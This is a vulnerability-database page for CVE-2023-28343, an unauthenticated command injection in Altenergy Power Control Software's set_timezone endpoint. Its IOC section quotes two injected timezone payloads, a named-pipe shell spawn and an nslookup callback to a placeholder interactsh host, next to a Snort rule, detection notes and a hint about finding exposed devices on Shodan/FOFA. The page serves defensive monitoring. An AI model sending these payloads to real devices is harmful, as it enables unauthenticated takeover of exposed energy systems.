cbcvebase.
CVE-2023-28343
published 2023-03-14

CVE-2023-28343: OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter…

PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
85.33%
99.7th percentile
OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter, because of set_timezone in models/management_model.php.

Affected

1 ranges
VendorProductVersion rangeFixed in
apsystemsenergy_communication_unit_firmware

Detection & IOCsextracted from sources · hover to see the quote

url/index.php/management/set_timezone
path/index.php/management/set_timezone
commandtimezone=`mknod /tmp/pipe p;/bin/sh 0/tmp/pipe`
commandtimezone=`nslookup {{interactsh-url}}`
snort
alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET WEB_SPECIFIC_APPS Altenergy Power Control Software Command Injection Attempt (CVE-2022-25237)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/management/set_timezone"; fast_pattern; endswith; http.request_body; content:"timezone="; pcre:"/^[^&]{0,50}(?:%60|%24|%3B)/PRi"; reference:url,github.com/superzerosec/CVE-2023-28343; reference:cve,2023-28343; classtype:attempted-admin; sid:2044825; rev:1; metadata:affected_product HTTP_Server, attack_target Server, created_at 2023_03_28, cve CVE_2022_25237, deployment Perimeter, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2023_03_29, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
  • Exploit sends HTTP POST to /index.php/management/set_timezone with shell metacharacters (backtick, $, ;) in the 'timezone' body parameter. Look for URL-encoded variants: %60 (backtick), %24 ($), %3B (;) in the request body.
  • Exploit sets specific HTTP headers: X-Requested-With: XMLHttpRequest and Content-Type: application/x-www-form-urlencoded; charset=UTF-8. Referer is set to /index.php/management/datetime. Combination of these with a POST to set_timezone is a strong signal.
  • Successful exploitation returns HTTP 200 with body containing 'Time Zone updated successfully' and Content-Type text/html. Monitor for this response following suspicious timezone POST requests.
  • Shodan/FOFA exposure: devices with title 'Altenergy Power Control Software' are the target surface. Use these queries to identify exposed assets.
  • The exploit creates a named pipe at /tmp/pipe and spawns /bin/sh — monitor for mknod calls creating FIFOs in /tmp and subsequent shell execution from web server processes.
  • DNS interaction (OOB) via nslookup is used for blind detection of the injection. Monitor outbound DNS queries originating from the web server process as an indicator of successful exploitation.
  • ·APSystems has not responded to CISA mitigation requests; no vendor patch is confirmed available. Detection and network isolation are the primary defensive options.
  • ·The vulnerability requires no authentication (PR:N, UI:N), meaning any network-reachable instance is exploitable without credentials.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.